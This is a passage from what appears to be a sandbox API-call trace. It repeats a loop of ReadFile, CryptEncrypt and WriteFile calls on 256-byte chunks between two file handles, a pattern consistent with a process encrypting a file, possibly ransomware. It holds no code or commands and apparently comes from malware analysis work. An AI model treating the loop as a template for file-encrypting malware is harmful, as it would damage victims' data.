pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.283] GetLastError () returned 0x0 [0168.283] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.283] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.283] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.283] GetLastError () returned 0x0 [0168.283] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.283] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.283] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.283] GetLastError () returned 0x0 [0168.283] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.283] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.283] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.283] GetLastError () returned 0x0 [0168.284] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.284] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.284] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.284] GetLastError () returned 0x0 [0168.284] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.284] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.284] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.284] GetLastError () returned 0x0 [0168.284] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.284] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.284] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.284] GetLastError () returned 0x0 [0168.284] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.284] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.284] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.284] GetLastError () returned 0x0 [0168.284] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.284] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.284] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.284] GetLastError () returned 0x0 [0168.284] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.284] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.284] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.284] GetLastError () returned 0x0 [0168.284] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.285] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.285] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.285] GetLastError () returned 0x0 [0168.285] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.285] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.285] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.285] GetLastError () returned 0x0 [0168.285] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.285] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.285] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.285] GetLastError () returned 0x0 [0168.285] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.285] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.285] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.285] GetLastError () returned 0x0 [0168.285] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.285] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.285] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.285] GetLastError () returned 0x0 [0168.285] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.285] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.285] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.285] GetLastError () returned 0x0 [0168.285] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.285] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.286] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.286] GetLastError () returned 0x0 [0168.286] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.286] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.286] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.286] GetLastError () returned 0x0 [0168.286] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.286] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.286] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.286] GetLastError () returned 0x0 [0168.286] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.286] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.286] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.286] GetLastError () returned 0x0 [0168.286] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.286] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.286] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.286] GetLastError () returned 0x0 [0168.286] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.286] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.286] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.286] GetLastError () returned 0x0 [0168.286] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.286] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.286] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.286] GetLastError () returned 0x0 [0168.286] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.287] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.287] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.287] GetLastError () returned 0x0 [0168.287] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.287] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.287] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.287] GetLastError () returned 0x0 [0168.287] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.287] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.287] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.287] GetLastError () returned 0x0 [0168.287] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.287] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.287] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.287] GetLastError () returned 0x0 [0168.287] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.287] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.287] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.287] GetLastError () returned 0x0 [0168.287] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.287] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.287] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.287] GetLastError () returned 0x0 [0168.287] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.287] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.288] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.288] GetLastError () returned 0x0 [0168.288] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.288] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.288] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.288] GetLastError () returned 0x0 [0168.288] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.288] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.288] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.288] GetLastError () returned 0x0 [0168.288] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.288] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.288] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 